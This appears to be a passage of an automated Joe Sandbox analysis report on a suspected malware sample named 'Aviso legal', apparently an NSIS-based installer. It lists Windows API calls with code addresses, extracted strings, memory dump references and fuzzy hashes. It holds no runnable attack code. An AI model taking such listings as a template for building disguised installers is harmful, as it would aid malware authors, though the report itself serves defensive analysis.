                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004052D7
                                • SendMessageW.USER32(?,00000420,00000000,?), ref: 004052FB
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                • GlobalFree.KERNEL32(?), ref: 00405340
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                • ShowWindow.USER32(00000000), ref: 004054FC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 2564846305-813528018
                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                • ShowWindow.USER32(?), ref: 00403FF6
                                • GetWindowLongW.USER32(?,?), ref: 00404008
                                • ShowWindow.USER32(?,?), ref: 00404021
                                • DestroyWindow.USER32 ref: 00404035
                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                • EnableWindow.USER32(?,?), ref: 00404281
                                • EnableWindow.USER32(?,?), ref: 0040429C
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 004042D1
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                • String ID:
                                • API String ID: 1860320154-0
                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                APIs
                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,?,?,0040363D,0000000B), ref: 0040691C
                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                • lstrcatW.KERNEL32(00442000,0042D268), ref: 00403C6D
                                • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,00440800,00442000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75E03420), ref: 00403CED
                                • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,00440800,00442000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                • GetFileAttributesW.KERNEL32(00432EA0,?,00000000,?), ref: 00403D0B
                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403D54
                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403DA9
                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-1115850852
                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                APIs
                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                • GetSysColor.USER32(?), ref: 00404738
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                • lstrlenW.KERNEL32(?), ref: 00404759
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                • SendMessageW.USER32(00000000), ref: 004047DB
                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                • SetCursor.USER32(00000000), ref: 0040485A
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                • SetCursor.USER32(00000000), ref: 00404876
                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                • SendMessageW.USER32(?,00000000,00000000), ref: 004048B7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                • String ID: N
                                • API String ID: 3103080414-1130791706
                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                APIs
                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                • BeginPaint.USER32(?,?), ref: 00401047
                                • GetClientRect.USER32(?,?), ref: 0040105B
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                • DeleteObject.GDI32(?), ref: 004010ED
                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                • DeleteObject.GDI32(?), ref: 00401165
                                • EndPaint.USER32(?,?), ref: 0040116E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F
                                • API String ID: 941294808-1304234792
                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                • wsprintfA.USER32 ref: 00406202
                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,?,00431108,?,?,?,?,?), ref: 0040623D
                                • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 0040624C
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$[Rename]
                                • API String ID: 2171350718-461813615
                                • Opcode ID: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                • Opcode Fuzzy Hash: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 00404AF1
                                • lstrcatW.KERNEL32(?,00432EA0), ref: 00404AFD
                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 00406827
                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,00442800,00442800,00403810), ref: 00406836
                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040683B
                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040684E
                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                • String ID: A
                                • API String ID: 2624150263-3554254475
                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040308E
                                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                • GlobalAlloc.KERNEL32(?,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                Strings
                                • soft, xrefs: 0040316B
                                • Null, xrefs: 00403174
                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                                • }8@, xrefs: 00403227, 00403242
                                • Error launching installer, xrefs: 004030CD
                                • Inst, xrefs: 00403162
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                • API String ID: 2803837635-2852043193
                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                APIs
                                • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 00406695
                                • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,75E023A0), ref: 004066A8
                                • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                Strings
                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4260037668-730719616
